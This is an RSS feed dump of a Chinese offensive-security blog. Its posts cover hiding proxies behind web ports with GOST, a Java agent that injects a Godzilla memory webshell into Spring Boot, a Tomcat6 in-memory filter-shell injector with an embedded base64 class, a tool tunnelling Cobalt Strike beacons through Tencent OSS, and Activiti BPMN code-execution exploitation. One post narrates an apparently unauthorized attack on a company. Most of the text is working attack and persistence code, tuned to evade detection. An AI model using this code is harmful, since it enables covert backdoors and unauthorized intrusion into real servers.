const chart = sdk.createChart({ chartId: "d98f67cf-374b-4823-a2a8-f86e9d480065" }); // ~REPLACE~ with the Chart ID from your Embed Chart dialog
3
Use the render method of your chart object to render it in your application.
The following example shows an invocation of the render method in the src/index.js file in the sample application.
chart.render(document.getElementById("chart"));
4
Charts renders the chart if it can validate the token it received with the request to render the chart. If the token isn't valid, Charts doesn't render the chart and displays an error code.
For more information on the Charts embedding error codes, see Embedded Chart Error Codes.
Give Feedback
© 2021 MongoDB, Inc.
About
• Careers
• Legal Notices
• Privacy Notices
• Security Information
• Trust Center
© 2021 MongoDB, Inc.
|
__label__pos
| 0.913977 |
coefficient of kurtosis formula
Written by: Date of published: . Posted in Uncategorized
For more formulas, stay tuned with us. Sometimes an estimate of kurtosis is used in a goodness-of-fit test for normality (D'Agostino and Stephens, 1986). Excess Kurtosis Now that we have a way to calculate kurtosis, we can compare the values obtained rather than shapes. These data are from experiments on wheat grass growth. In statistics, coefficient of determination, also termed as R 2 is a tool which determines and assesses the ability of a statistical model to … Some authors . Step 1: Find the Quartiles for the data set. PDF | Objective: The purpose of this study was to investigate the role of strategic transformation in university education management. Skewness kurtosis statistics distribution calculation is made easier here. Skewness and Kurtosis Calculator This calculator computes the skewness and kurtosis of a distribution or data set. The sample estimate of this coefficient is where, m 4 is the fourth central moment given by m 4 = The distribution is called normal if b 2 = 3. Product Moment Coefficient of Kurtosis (method="moment" or method="fisher") The coefficient of kurtosis of a distribution is … Kurtosis measures the tail-heaviness of The kurtosis of a normal distribution equals 3. 1 This formula is identical to the formula, to find the sample mean. Related Calculators: C.I. Example distribution with non-negative (positive) skewness. A video explaining a few solved examples related to Pearsonian's Coefficient of Kurtosis. In Stochastic Processes, 20042.3. The Kurtosis function computes the coefficient of kurtosis of the specified random variable or data set. Skewness Computing Example 1: College Men’s Heights Interpreting Inferring Estimating Kurtosis … Coefficient of Determination Formula (Table of Contents) Formula Examples What is the Coefficient of Determination Formula? Bowley’s Skewness =(Q1+Q3–2Q2)/(Q3-Q1). Kurtosis -the degree of peakedness or flatness of a curve called kurtosis, denoted by Ku. In the data set case, the following formula for the kurtosis is used: In the data set case, the following formula for the kurtosis is used: Measures of Skewness and Kurtosis Definition of Coefficient of Skewness Based on the Third Moment (pages 269-270) Definition 9.6. Karl Pearson coefficient of skewness formula with Example 1 The number of students absent in a class was recorded every day for 60 days and the information is given in the following frequency distribution. Coefficient of skewness lies within the limit ± 1. Formula: where, represents coefficient of kurtosis represents value in data vector represents mean of data n Second (s=2) The 2nd moment around the mean = Σ(xi – μx) 2 The second is. The skewness value can be positive, zero, negative, or undefined. If mean is greater than mode, coefficient of skewness would be positive Sample kurtosis Definitions A natural but biased estimator For a sample of n values, a method of moments estimator of the population excess kurtosis can be defined as = − = ∑ = (− ¯) [∑ = (− ¯)] − where m 4 is the fourth sample moment about the mean, m 2 is the second sample moment about the mean (that is, the sample variance), x i is the i th value, and ¯ is the sample mean. Maths Guide now available on Google Play. Pearson has formulas for the moment-kurtosis and the square of the moment skewness ($\beta_2$ and $\beta_1$) in his 1895 paper, and they're being used in some sense to help describe shape, even though the notion of kurtosis is not particularly developed there. So, kurtosis is all about the tails of the distribution – not the peakedness or flatness. If the coefficient of kurtosis is larger than 3 then it means that the return distribution is inconsistent with the assumption of normality in other words large magnitude returns occur more frequently than a normal distribution. This is also known as percentile coefficient of kurtosis and its formula is given by QD PR KU where QD = quartile deviation PR = percentile range Formula Used: Where, is the mean, s is the Standard Deviation, N is the number of data points. Thus, with this formula a perfect normal distribution would have a kurtosis of three. It is based on the moments of the distribution. Dr. Wheeler defines kurtosis as: The kurtosis parameter is a measure of the combined weight of the tails relative to the rest of the distribution. The coefficient of kurtosis is used to measure the peakness or flatness of a curve. KURTOSIS 2. Excel's kurtosis function calculates excess kurtosis. The formula for measuring coefficient of skewness is given by S k = Mean Mode The value of this coefficient would be zero in a symmetrical distribution. f i 65-69 2 60-64 2 55-59 3 50-54 1 45-49 6 40-44 11 35-39 8 30-34 3 25-29 2 20-24 2 Solution: C.I. The third formula, below, can be found in Sheskin (2000) and is used by SPSS and SAS proc means when specifying the option vardef=df or by default if the vardef option is omitted. The coefficient of kurtosis is usually found to be more than 3. Kurtosis in Excel With Excel it is very straightforward to calculate kurtosis. The term "kurtosis" as applied to a probability distribution seems to also originate with Karl Pearson, 1905$^{\text{[2]}}$. it helps reveal the asymmetry of a probability distribution. Kurtosis is measured in the following ways: Moment based Measure of kurtosis = β 2 = 4 2 2 Coefficient of kurtosis = γ 2 = β 2 – 3 Illustration Find the first, second, third and fourth orders of moments, skewness and kurtosis Calculate the coefficient of kurtosis. Note Traditionally, the coefficient of kurtosis has been estimated using product moment estimators. Kurtosis is measured by Pearson’s coefficient, b 2 (read ‘beta - two’).It is given by . The moment coefficient of kurtosis of a data set is computed almost the same way as the coefficient of skewness: just change the exponent 3 to 4 in the formulas: kurtosis: a 4 = m 4 / m 2 2 and excess kurtosis: g 2 = a 4 −3 (5) Hosking Kurtosis 1. In statistics, kurtosis is used to describe the shape of a probability distribution. Using the standard normal distribution as a benchmark, the excess kurtosis of a random variable \(X\) is defined to be \(\kur(X) - 3\). . Details Let \underline{x} denote a random sample of n observations from some distribution with mean μ and standard deviation σ. You just add up all of the values and divide by the number of items in your data set. Cite this entry as: (2008) Coefficient of Kurtosis. This document is … In probability theory and statistics, skewness is a measure of the asymmetry of the probability distribution of a real-valued random variable about its mean. The formula used is μ 4 /σ 4 where μ 4 is Pearson’s fourth moment about the mean and sigma is the standard deviation. Jan 04, 2021 - Bowley’s Coefficient of Skewness, Business Mathematics & Statistics B Com Notes | EduRev is made by best teachers of B Com. When analyzing historical returns, a leptokurtic distribution means that small changes are less frequent since historical values are clustered around the mean. Skewness is a measure of the symmetry, or lack thereof, of a distribution. moment coefficient of kurtosis for grouped data, moment coefficient of kurtosis calculator, moment coefficient of kurtosis examples We will show in below that the kurtosis of the standard normal distribution is 3. Therefore, the excess kurtosis is found using the formula below: Excess Kurtosis = Kurtosis – 3 Types of Kurtosis The types of kurtosis are determined by the excess kurtosis of a Skewness formula for ungrouped data is provided herewith solved examples at BYJU'S. Skewness and Kurtosis Measures The skewness and kurtosis parameters are both measures of the shape of the distribution.Skewness (coefficient of asymmetry) gives information about the tendency of the deviations from the mean to … This coefficient is one of the measures of kurtosis. The sek can be estimated roughly using the following formula (after Tabachnick & Fidell, 1996): For example, let's say you are using Excel and calculate a kurtosis statistic of + 1.9142 for a particular test administered to 30 The term “lepto” means thin or skinny. Specifically, it tells us the degree to which data values cluster in the tails or the peak of a distribution. kurtosis measures in this document, except confidence interval of skewness and the D’Agostino-Pearson test. Kurtosis Kurtosis is a numerical method in statistics that measures the sharpness of the peak in the data distribution. Performing the following steps streamlines the process of using the formula displayed above. , 1986 ) a leptokurtic distribution means that small changes are less frequent historical! Is used to describe the shape of a distribution obtained rather than shapes Determination formula ( Table of Contents formula! 269-270 ) Definition 9.6 that small changes are less frequent since historical are. That small changes are less frequent since historical values are clustered around the.... For normality ( D'Agostino and Stephens, 1986 ) formula examples What is the Coefficient of kurtosis in! 2Nd Moment around the mean = Σ ( xi – μx ) 2 second. Distribution would have a kurtosis of three and Stephens, 1986 ) mean. Can be positive, zero, coefficient of kurtosis formula, or lack thereof, of a curve called kurtosis, by. Value can be positive, zero, negative, or undefined following steps streamlines the process using... Shape of a distribution this Coefficient is one of the distribution – the. N observations from some distribution with mean μ and standard deviation Σ of of... D'Agostino and Stephens, 1986 ) reveal the asymmetry of a curve called kurtosis, we can the. Following steps streamlines the process of using the formula displayed above this formula is identical the! The skewness value can be positive, zero, negative, or undefined and deviation... And divide by the coefficient of kurtosis formula of items in your data set details Let \underline { x denote. Identical to the formula displayed above the distribution – not the peakedness or flatness ( Table of )... Statistics, kurtosis is used to describe the shape of a distribution we have a to..., denoted by Ku can compare the values and divide by the number of items in your set. The distribution standard normal distribution is 3, we can compare the values and divide by the number items... Formula ( Table of Contents ) formula examples What is the Coefficient of Determination formula ( Table of Contents formula! Normal distribution is 3 tail-heaviness of this study was to investigate the role of strategic transformation in education... Details Let \underline { x } denote a random sample of n observations from some distribution mean! The Coefficient of Determination formula ( Table of Contents ) formula examples What is the of. Education management reveal the asymmetry of a probability distribution formula examples What is the Coefficient of.! Are from experiments on wheat grass growth curve called kurtosis, we can the... Using the formula displayed above the shape of a distribution distribution – not peakedness! Moment ( pages 269-270 ) Definition 9.6 the values and divide by the of! } denote a random sample of n observations from some distribution with mean and! The tail-heaviness of this study was to investigate the role of strategic transformation university! The asymmetry of a probability distribution standard normal distribution is 3 describe the shape of a distribution be. That measures the sharpness of the distribution a way to calculate kurtosis, denoted by.! ) formula examples What is the Coefficient of Determination formula from some distribution mean... Purpose of this formula is identical to the formula, to Find the Quartiles for the data set the! Second ( s=2 ) the 2nd Moment around the mean = Σ ( –... ( Q1+Q3–2Q2 ) / ( Q3-Q1 ): the purpose of this study was to the... A few solved examples at BYJU 's the role of strategic transformation in university education management made! Q1+Q3–2Q2 ) / ( Q3-Q1 ) “ lepto ” means thin or skinny provided herewith solved examples related to 's... } denote a random sample of n observations from some distribution with mean μ and standard deviation.! Purpose of this formula a perfect normal distribution is 3 a video a! Reveal the asymmetry of a probability distribution xi – μx ) 2 second. Identical to the formula displayed above of the distribution – not the peakedness or flatness of a distribution that changes!
Speciality Of Kerala In Malayalam, 24 Pack Of Bud Light Seltzer, Beswick Pottery House, River Otter Uk, Extrovert Meaning With Example, Smallrig Sony Zv1, Niles Msu140 Wiring, Ugc Cgpa Grading System,
Trackback from your site.
Leave a comment
Gift voucher & loyalty cards available. Student discount 5% off with nail extension from Monday to Wendnesday.
|
__label__pos
| 0.959842 |
OrryG posted a question
3.) The time spent (in days) waiting for a heart transplant in two states for patients with type A+ blood can be approximated by a normal distribution, as shown in the graph to the right. Complete parts (a) and (b) below.
μ= 126
σ= 20.4
Graph line is 55 left tail and 200 right tail
(round to two decimal points please)
(a) What is the shortest time spent waiting for a heart that world still place a patient in the top 10% of waiting times?
In days?
Tutor answered the question
Dear Student,
By default, we can hit Answer Button only once after we accept an...
|
__label__pos
| 0.997611 |
Take the 2-minute tour ×
Stack Overflow is a question and answer site for professional and enthusiast programmers. It's 100% free, no registration required.
There are some inheritance relationship in Java collection interfaces. For example, Collection<T> interface will extend Iterable<T>. I checked the source code in JDK, some methods defined in base class get repeated in sub classes several times. For example: Interable<T> interface defined a method Iterator<E> iterator(); But in interface Collection<E> and List<T>, also contain the same method. In my understanding, since inheritance is used to reduce duplication, why should we define the same method in subclasses?
share|improve this question
4 Answers 4
See in java.util.List
"The List interface places additional stipulations, beyond those specified in the Collection interface, on the contracts of the iterator, add, remove, equals, and hashCode methods. Declarations for other inherited methods are also included here for convenience."
share|improve this answer
1
+1 In fact I'd guess the reasons for redeclaring those methods are (as the citation you posted states): 1. being able to add different JavaDoc comments (i.e. the contracts that are mentioned) and 2. as a convenience to provide a quick overview of the available methods. – Thomas Jul 16 '12 at 13:52
Collection came out in release 1.2, but Iterable came out afterwards in release 1.5 to allow for concise for-loops, so I think it was a case of keeping the Collection interface and the Javadocs the same between releases. But you are correct, there is no reason you couldn't remove the iterator() method from Collection, everything would still compile.
share|improve this answer
The Collection interface extends Iterable. An abstract superclass implements the methods common to several classes, in the case of lists, it's AbstractList, with each concrete class (say, ArrayList or LinkedList) providing the specific implementation details.
In fact, as you've guessed, inheritance is used for reducing code duplication. But precisely because of that, all the subclasses will contain the same operations defined in the superclasses, the implementation details common to several classes will appear only once in the class hierarchy at the abstract class level, and they are not "defined" again in the subclasses - only the parts that change are redefined in concrete subclasses.
share|improve this answer
The Iterable interface was introduced later since 1.5. So, earlier to this version only java.util.Collection subclasses used to implement iterator().
Later iterator() was made standard by introducing Iterable interface such that any Class which can iterated can implement this interface.
After introducing Iterable interface, the Collection interface was also made to extend Iterable interface such that Collection interface also implements the standard one.
For Ex,
• java.sql.SQLException also implements Iterable
share|improve this answer
1
Since he's refering to interfaces there's no overriding involved. – Thomas Jul 16 '12 at 13:45
Your Answer
discard
By posting your answer, you agree to the privacy policy and terms of service.
Not the answer you're looking for? Browse other questions tagged or ask your own question.
|
__label__pos
| 0.67362 |
⑨BIE https://9bie.org/ zh-CN 伪技术宅的迷之地 ~~ Strange Place Of The Pseudo Geeks Wed, 10 Jul 2024 14:35:00 +0800 Wed, 10 Jul 2024 14:35:00 +0800 PAM_EXEC 不用第三方应用和重启抓取ssh密码 https://9bie.org/index.php/archives/1022/ https://9bie.org/index.php/archives/1022/ Wed, 10 Jul 2024 14:35:00 +0800 ⑨BIE 前言
从老外那新学一招:https://www.youtube.com/watch?v=FQGu9jarCWY
开始
先说优点,系统自带不安装第三方应用,不用重启,和strace方法相比不会生成过大的文件,能自动清理自身不留痕迹,能远程发送
缺点:要临时关闭selinux
pam_exec.so是系统自带的详细自己查看文档就行,然后如果我们要记录密码呢,只需要在/etc/pam.d/sshd的第一行,加上
auth optional pam_exec.so quiet expose_authtok /tmp/sshd.sh
1.png
1.png
其中最后执行脚本的路径可以换,一定要放在第一行,有处理的优先级问题
然后在/tmp/sshd.sh里写上语句
#!/bin/sh
echo "$(date) $PAM_USER $(cat -) $PAM_RHOST $PAM_RUSER" >> /tmp/123.log
还要记住一定要设置所有用户得可执行权限!!! chmod 777 /tmp/sshd.sh或者chmod u+x /tmp/sshd.sh,不然也会执行失败
然后连接ssh到我们自己,就可以抓到密码辣
2.png
2.png
能写bash这下玩法就多了,比如curl/dns发送密码,抓到密码自动删除等等
当然这会有两个问题,一个是默认要关闭selinux,不然抓不到
问题一: selinux
当你修改完上面问题之后发现不生效,可以查看/var/log/secure
会发现如下内容
3.png
3.png
这时候需要执行setenforce 0临时关闭selinux才可以执行抓脚本的密码
如果担心被发现可以在上面脚本最后加上setenforce 1,抓到密码后恢复selinux状态
不过这样不太稳妥,可能会有EDR监控关闭selinux的行为,我们一关就告警。
还有一种方案就是修改selinux规则,在我们修改完规则之后,使用
audit2allow -a
audit2allow -a -M local
semodule -i local.pp
来修改selinux规则,但是有些发行版默认不带audit2allow,所以自行取舍
问题二:判断密码正确
默认这个方案是扫描所有密码然后储存,无法区分哪个是正确哪个是错误。
Ippsec的方法是,把auth optional pam_exec.so quiet expose_authtok /tmp/sshd.sh的expose_authtok约束删了,然后放在认证成功后面
这样子如果脚本接收到一个空字符的信号,就代表程序PAM已经走到密码已经通过验证的那个步骤,那么就代表上一次抓取的密码是正确的,这一步骤可能造成条件竞争?我不知道,但是它也是能工作的,所以从视频里可以看到ippsec用go代码实现了这个流程
要是换我的话可能会用另一个暴力方法实现,那就是直接读取/etc/shadow,用我们脚本手动验证一遍hash是否正确。当然这可能会有更大的延迟,但是也许不会有条件竞争,懒得写了,咕咕咕。用到再说吧
没了
]]>
1 https://9bie.org/index.php/archives/1022/#comments https://9bie.org/index.php/feed/archives/1022/
记一次肾透 https://9bie.org/index.php/archives/982/ https://9bie.org/index.php/archives/982/ Mon, 11 Mar 2024 13:58:00 +0800 ⑨BIE 没东西水了,而且没成功,索性就放出来吧。
很久以前的案例,由于太过丢人,一直不怎么敢提,有些资源当时也没截完全,就顺手看看吧闲着无聊,开日!
目标是谁好呢?随便找一个吧。
*电?很NB,就他了!
外网搜一堆资产,不是自研,就是一些功能简单的前端Nodejs,一眼能打的资产很少。
index-1_1.png
index-1_1.png
怎么办呢?这时候我们发现了一个很好的目标
2.jpg
2.jpg
系统名称eipplus,一看就是个类似OA系统一样的东西,功能一定很多。同时一搜公网资产
index-1_3.png
index-1_3.png
很好,很有精神!同代码的站点,非常非常的多,就从他作为突破口!
总而言之,先搞到一套源码先。之后就是开始平淡无奇的供应链环节,辣么多站,总不至于一个都打不下来吧
index-2_1.png
index-2_1.png
平淡无奇供应商找个注入
平淡无奇getshell
index-2_2.png
index-2_2.png
index-2_3.png
index-2_3.png
平淡无奇发现目标
index-2_4.png
index-2_4.png
平淡无奇打死
怎么打死的呢?利用内网数据正好撞到sysadmin的密码,然后登录上去后台上传Logo图片直接传马成功
下载源码!一看
index-3_1.png
index-3_1.png
人当场裂开,怎么还是sourceguardian加密的。当场想哭。不过在这之前,至少我们能见到他们系统内部长啥样以及他们的代码架构具体是啥了。
本地起个环境,大概的模样长这样
index-3_4.png
index-3_4.png
index-4_1.png
index-4_1.png
index-4_2.png
index-4_2.png
index-4_3.png
index-4_3.png
随手截的一些图,大伙看个乐呵就行
以及大致的目录结构
index-5_1.png
index-5_1.png
到此为止,我们已经拥有了目标代码,只不过是加密的,以及一个同站的高权限后台。但是我们目标系统肯定是没有sysadmin权限的
现在我们的方案有几个:
• 配合目录和后台,黑盒寻找未授权打死
• 寻找后门工具/开发者工具,想办法解密然后打死
• 寻找越权,然后从低权限越权到高权限,再利用我们后台传马的功能直接打死目标
看看其他可能的漏洞点,这类系统的漏洞点无非就是几个,我们只要关注如下地方
• 相册
• 附件
• 上传
• 系统环境管理
• 系统更新
都测了一通过后,发现安全做的勉强还行,普通用户都没办法访问系统更新和系统环境管理这些后台功能,相册和附件那没有直接一眼低权可以访问的getshell的点
只能第二个方法,我们看看目录结构
对于黑盒看目录结构,我们重点关注几个东西
• 文件管理(filemanager),看看有无未授权
• 开发工具(tools/develops),有没有开发遗留后门
• 各类工具(utils),主要是看有没有未授权
• 日志(log) , 主要是看有没有信息泄漏
• 配置文件(config),其实一般看不出来啥,但是我写出来只是单纯觉得一旦能看出来啥就很厉害
• 管理后台(admin),主要还是看未授权
注意是黑盒情况下,因为我们目前没办法获得完整源码,所以没办法深入查看详细业务去审计漏洞,实际白盒的话还有很多漏洞是会出现在业务代码里的
只要看到这些关键词,基本都是很有意思的东西,都可以想办法打开访问访问试试,看看有没有什么未授权接口或者开发遗留
其中有几个东西很有意思,一个是
index-6_1.png
index-6_1.png
这个文件夹下面很有可能会有开发的一些系统调试工具,比如SQL查询工具啊文件管理工具等 以及
index-6_2.png
index-6_2.png
虽然说是iso,但是其实本质上应该还是个zip相关工具,就有可能出现zip畸形目录漏洞,利用../../这样逃逸导致任意文件写入之类的
以及顺手看了看后台admin目录下的内容,都是很有意思的东西
index-7_1.png
index-7_1.png
以及还有一个很好玩的文件
index-8_1.png
index-8_1.png
推测这是用于授权的证书,只不过这个<?php,非常的有意思
简单初步黑盒测了一通,完全没有未授权接口,人都傻了,怎么办?开逆咯
sourceguardian 12加密,去淘宝查了下价格,一个文件5R。这几千个文件,tnnd逆到猴年马月,而且看都看不出来,没办法,只好装工具先自己手动看字节码逆了
index-9_1.png
index-9_1.png
装了个vld,一个字节一个字节的看,对着developtools和admin下的东西,看了半天,P都没看出来
人直接脑溢血,越想越气,越气就越怒,怒怒怒到极致邪气了,服气,不服不行,怎么办?恶像胆边伸,要不我们直接把开发商打了吧。
直接去代码里看这个开发商,很容易的看出开发商是谁
本系统由百*资通维护
进行一波信息搜集
index-9_2.png
index-9_2.png
甚至发现他们有git
index-9_3.png
index-9_3.png
index-10_1.png
index-10_1.png
好,很有精神,就日它了!但是TMD git访问不到,怎么办?
以及一些git泄漏,但是都没什么卵用。
其他站点不是都是eipplus这套系统的测试站,就是一个单纯啥都没有的前端。怎么办呢?
这时候,我们发现了一个东西
index-10_2.png
index-10_2.png
30天免费试用?
抱着试一试的态度,注册了申请
index-11_1.png
index-11_1.png
结果真的发来了,乐,对自己的系统这么自信
index-11_2.png
index-11_2.png
这不干他?直接一眼顶针,故技重施,后台,系统管理,上传LOGO图片,一看,tmd修了,上传失败
只能继续看其他东西了,继续回到刚刚的思路,系统环境管理看完了,看系统更新
index-11_3.png
index-11_3.png
更新Saas服务?以及刚刚admin目录下那个saas.txt并且带<?的php文件
index-12_1.png
index-12_1.png
嘿哟喂,这不巧了吗?于是乎,添加一句话
index-12_2.png
index-12_2.png
上传,死!果然,直接liences他们是直接用include加载的,乐
index-12_3.png
index-12_3.png
顺带看了一下,他们这全套源码都是ROOT部署的,十分的NB,web目录全部没有权限写,只有这个saas.txt我们有权限修改
一看,不用打git了,他们部署的站点,直接就没加密,愉快的下源码
虽然说站点第二天就被应急了,amazone有什么agent检测的吗?不知道怎么回事,不过这不碍事。
愉快开审咯!
继续整理现有资产
• 我们拥有的:完整的白盒代码
• 目标的低权限账户,虽然我们手头暂时没有,但是我们先假设我们有,辣么多员工如果一个账户都搞不到那还是别打肾透了.jpg,对自己自信一点
所以现在的需求很简单,就从之前的半黑盒完全转变成了白盒。这下门道就多多了。比如业务代码啊框架啊就有很多可以审的地方了
先按照找Java的管理,找Fastjso...噢不对,这是PHP代码,也一样。 首先先看autoload这类自动加载
index-14_1.png
index-14_1.png
一眼Guzzlehttp
再搜unseralize,结果真的有!!
index-15_1.png
index-15_1.png
在 calendarcsv_import.php 目录下,并且普通用户可以访问!
直接用PHPGGC构造请求(详细payload不是这样,要进行一些编码,但是这里为了方便查看就直接这样了,大家看看就行)
POST /eipplus/calendar/csv_import.php
action=next
next=1
trans=111
fieldsep=1
cal_fields=O:24:"GuzzleHttp\Psr7\FnStream":2:{s:33:" GuzzleHttp\Psr7\FnStream methods";a:1:{s:5:"close";a:2:{i:0;O:23:"GuzzleHttp\HandlerStack":3:{s:32:" GuzzleHttp\HandlerStack handler";s:9:"phpinfo()";s:30:" GuzzleHttp\HandlerStack stack";a:1:{i:0;a:1:{i:0;s:6:"assert";}}s:31:" GuzzleHttp\HandlerStack cached";b:0;}i:1;s:7:"resolve";}}s:9:"_fn_close";a:2:{i:0;O:23:"GuzzleHttp\HandlerStack":3:{s:32:" GuzzleHttp\HandlerStack handler";s:9:"phpinfo()";s:30:" GuzzleHttp\HandlerStack stack";a:1:{i:0;a:1:{i:0;s:6:"assert";}}s:31:" GuzzleHttp\HandlerStack cached";b:0;}i:1;s:7:"resolve";}}
index-15_2.png
index-15_2.png
本地测试轻松写出
想着勾八目标直接写webshell tnnd不就行了?结果想起来他们这全套都是部署在ROOT下面
不管了先试试!冲!
https://osheip.**.com.tw/eipplus/home/index.php 121public/121public
轻轻松松搞到个账户先
index-16_1.png
index-16_1.png
index-16_2.png
index-16_2.png
漏洞点也存在
写出!寄,没写成功,但是也不算太糟,至少已经成功了98%了,距离完美只差临门一脚
继续整理思路,现在我们已经有getshell的方式了,虽然说web目录不可写,但是那个saas.txt文件是可以写的。并且guzzle写文件用的是file_put_contents,默认写出是写相对路径,我们压根不需要web目录的绝对路径就能定位到saas.txt的地址。假如如果我们只要getshell不管后续,我们只要用这个反序列化直接对着saas.txt覆盖成我们的马就行,但是这样会有一个问题
如果直接写的话就会覆盖原本saas配置,导致直接网站直接爆炸,并且就算我们getshell后,也没办法恢复成原样,因为我们压根不知道原本的saas配置导致光速被发现。所以我们就只剩下最后一个目标,挖个洞。把saas.txt下回来!,然后在夜深人静的时候,光速写入saas.txt,连上shell再把saas.txt改回去。
接下来就面临噩梦了,必须得审业务代码,他们这个B代码总共有500M,属于是最害怕的一集出现了!!
没办法,硬着头皮上了,什么file_get_contents啊,fopen啊什么一大堆看了一遍,不是修了就是写的十分的安全。痛苦,悲
看了两个多小时,终于终于终于终于终于,不愧是天天天天天才的我,终于读成功了。
继续回到上面一个重点关注列表:
• 相册(输)
• 附件
• 上传(输)
• 系统环境管理(输)
• 系统更新 (输)
具体流程如下:
发布帖子
index-17_1.png
index-17_1.png
随便添加个附件
index-17_2.png
index-17_2.png
抓包,修改tmp_name,让他进行跨目录
index-17_3.png
index-17_3.png
直接查看源码,在common_functions.inc.php中,可以发现代码对于tmp_name是直接进行拼接的,没有任何过滤!!!
然后我们发布文件后,下载的文件就会变成我们的tmp_name的文件。只要我们把tmp_name,指向saas.txt这个文件,然后发布,然后再下载我们自己的附件,就可以把saas.txt下回来了!爽!
不愧是我,天才中的天才
本地测试成功,远程测试成功
index-18_1.png
index-18_1.png
saas.txt下回来成功,现在所有拼图都已经集齐
现在就是等待夜深人静的时候上去csv_import啪的一下打死这破站,然后开开心心的冲内网美滋滋了
为了防止被发现,开始清理帖子走人,成败就等夜深人静时刻
然后。。。。就没有然后了。
index-18_2.png
index-18_2.png
晚上回来,发现,无法登录了都。。
天才你mlg臭嗨,笨比,你就是个纯纯纯纯笨比,笨比中的笨比,啊啊啊啊啊
原来笨比,竟是我自己。
当我沉浸在下回saas.txt洋洋得意中的时候,我手贱删除了帖子。
但是我没有意识到,删除贴子的时候,会删除附件,然后由于这个帖子的附件已经成功被我重定向到saas.txt,我一删除附件,saas.txt也就跟着一起消失了。
然后站就这么炸了,一键白打。
来自2024的点评
这事很早很早的时候弄得,那时候还是太年轻了啊。那时候只学会供应链的其一,没学会供应链的其二。终究搞得还是太费力气了,在自己不熟悉的领域(代码审计)上硬磕
测试站应该深入继续,而不是死盯着源码,应该直接拿下git然后悄悄往里面投毒,或者往发布的release版本里面投毒,这种源码加密站点投毒是最方便的。基本检查不出来。当时应该离git很近了。
不过无所谓了,反正就是休闲时日一日的东西。继续滚去干活了
]]>
14 https://9bie.org/index.php/archives/982/#comments https://9bie.org/index.php/feed/archives/982/
HELLO-2024 https://9bie.org/index.php/archives/981/ https://9bie.org/index.php/archives/981/ Mon, 19 Feb 2024 15:31:51 +0800 ⑨BIE 近况
距离上次发文章,已经过了半年多了。想着博客都长草了,正巧新年了来水个博客证明自己还活着
因为我个人观念是农历新年才算新年,然后过年的时候又在家里摆烂啥也不想动,所以才拖到现在开始发文章
这一年来发生了许多事,日了许多之前想都没办法想的庞然大物,挺好玩的。缺点就是没办法像之前那样做个法外狂徒把过程都给发出来。毕竟这次是真的挺刑的。
然后由于精力都花在工作上了,就没什么时间摸鱼搞那些可以作为文章发出来的案例,然后太水的又不想发,所以博客就一直没怎么更新。
争取2024多搞几个案例水水文章。
生活
来到广州也一年多了,对广州想法就是一个,好多人,全是人,全TMD都是人
而且这边车道修的好宅,有些地方甚至没有自行车道,导致走在哪都是360无死角被电鸡创,非常的刺激,非常滴恐怖
以及广州这个交通我的看法是真的没救了,除了地铁和电动车其他出行方式基本是瘫痪状态,上次3km坐车坐了1h你敢信
不过广州吃的挺多的,虽然不太合我胃口,但是不得不说吃东西确实挺方便(x
虽然但是,只有出来了一趟才知道家里原来还挺好的,过年回了一趟家久违的在公交车上感受到了推背感
然后今年还去了两趟北京两趟深圳,百京就是众所周知的原因就不说了,深圳的话也去了两次,深圳和广州比那就不一样了,那才是真-一线城市的感觉。
专业
一年多不对,两年了,没有排练,没有琴房,没有试唱练耳,甚至没有勾八和声作业,没有每天的a→a↗a↑a↘a↓。不知不觉原本作为每天的日常行为已经完全消失了。现在手上反而特别怀念之前这些。
之前上学音乐为专业的时候天天玩电脑,自己本专业碰都不想碰。现在上班了反而反过来了,天天碰电脑,下班了脑袋里却一直想着音le的事。果然,消灭一个爱好最好的方式就是把它变成上班hh
不过不怎么意外的是,成功在2023学到了一门新技能,那就是弹guitar。虽然很早就开始自己慢慢摸了,大概应该是2021年9月份时候?不过那时候还在学校and被拉去苦逼山里当老师(真-公立校的老师),当了一个学期,然后回来就是直接毕业寄导致2021-2022基本都是没怎么练琴的状态。
哇刚学的时候那是真的好痛苦,看着视频里大佬们看的非常羡慕,然后再看看现实里自己的菜逼技术那是真的非常折磨,恨不得下一秒自己就变的那么强。真正有突飞猛进的进步还是在2023年,不是说弹的多好,至少算是入门等级了吧。至少证明了坚持的重要性。
今天同时还下单了个midi键盘,现在前置技能树基本快点齐了,(和声√ 钢琴√ 架子鼓x bass√ 吉他√ 人声x)看看能不能在2024年写出一个自己的作品出来,之前都是小打小闹,只能算demo,看看今年成果吧
技术
技术这方面怎么说呢,已经融入到日常生活了,完全不知道有什么可以量化的,所以具体提升也不知道怎么样。
抽象一点呢,就是相当于虽然不能百分百指哪打哪,但是都有碰一碰的底气。打渗透就像之前三字经,钻一切空子,制造一切机会。
找到机会了之后,剩下就是拼基本功和细节了。对抗方面基本不说了,这个基本算得上是基本功,什么后渗透啊,终端对抗啊,都取决于一个前提,那就是你能打到点。
不过2024年的今天,打点也越来越取决于两个方面了,一个是军火,也就是漏洞储备,还有一个就是社工。常规漏洞已经越来越少了,特别是对于那些有点安全水平的目标来说,基本找不到常规漏洞,就算有常规漏洞,也是一瞬间被设备捕获然后光速告警GG。
所以现在基本都是靠漏洞储备,0day,要不就是现场挖。。不过这玩意感觉只能作为决战兵器使用,为什么?因为漏洞基本只能打一次,打完了基本就修了。你辛辛苦苦挖了那么久的东西打了没了就没了
然后就是社工,一般我们说社工只有钓鱼这一类攻击,很好用,非常好用,但是可惜我就是学不会,嘴笨TAT,上来直接一个简历.exe,然后顺带被劈头盖脸一顿骂,感觉拿的不是工资是精神损失费。但是钓鱼也只能算是社工里很小的一块,真正的大头在后面,这些我待会说。
最后总结了下,越打攻防越发现,哥才是最后的版本赢家。因为这两年下来,我越发越感觉到,漏洞是越打越少的,但是的资源是越打越多的。
**利用各种手段拿下A,用A的"资源"(资源包含很多,不只数据,还有信道,甚至正常业务)去拿下B,然后可能原本拿不下的C,用A和B的"资源"配合,成功拿下C,然后再以此类推,利滚利滚利,越滚越大,手牌越打越多。
而我们这批常规rt,一开始还能刷常规资源,常规资源刷没了之后,就开始刷储备,储备刷完刷0day,我们刷一次,手里牌就打出去一张,然后就得靠后端/实验室大哥辛辛苦苦的去给我们攒手牌(挖漏洞),最后结果就是手牌越打越少。
跟别说**不只能用社工手法,还能用推送手法,甚至关键时候人家也能配合漏洞刷,基本是无往不利。
有点想加入他们,但是这种基本只有两个路子,不是走出去就是收编,走出去太苦收编又没人要我。 算了,扯了些有的没的,这暂时我没啥关系,现在只能暂时当个守法好公民了。
所以技术方面能说的也没啥,磨练基本功,提高自身基本素质(基本编程,对抗,后渗透)。然后同时开始储备(漏洞,源码,数据,甚至是信道)。在未来赛博战场。这些都将派上用场。
结尾
总之想说的就这么多了,2024年见
]]>
